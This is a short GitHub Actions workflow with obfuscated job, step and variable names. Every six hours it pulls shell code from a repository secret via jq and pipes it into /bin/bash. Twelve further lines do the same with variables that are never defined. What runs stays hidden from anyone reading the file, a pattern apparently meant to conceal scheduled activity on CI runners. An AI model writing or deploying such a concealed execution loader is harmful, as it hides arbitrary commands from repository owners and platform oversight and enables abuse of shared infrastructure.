name: fuhongxue9521
on:
  workflow_dispatch:
  schedule:
    - cron: '27 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fuhongxue9521
        env:
          ntrky4610: ${{ secrets.ntrky4610 }}
        run: |
          echo $ntrky4610 | jq -r .j3722 | /bin/bash
          echo $gt500 | jq -r .qdlbs9239 | /bin/bash
          echo $t07 | jq -r .dvd28292 | /bin/bash
          echo $zppf10 | jq -r .pnjx1 | /bin/bash
          echo $zcue77324 | jq -r .ml892 | /bin/bash
          echo $rad926 | jq -r .jr7575 | /bin/bash
          echo $ztqr4 | jq -r .sdp924 | /bin/bash
          echo $hdd1608 | jq -r .gl9056 | /bin/bash
          echo $d94 | jq -r .xavb716 | /bin/bash
          echo $q04314 | jq -r .dxcug6 | /bin/bash
          echo $k7558 | jq -r .zact9 | /bin/bash
          echo $o5625 | jq -r .o12391 | /bin/bash
          echo $ccmko07525 | jq -r .xoqsj720 | /bin/bash

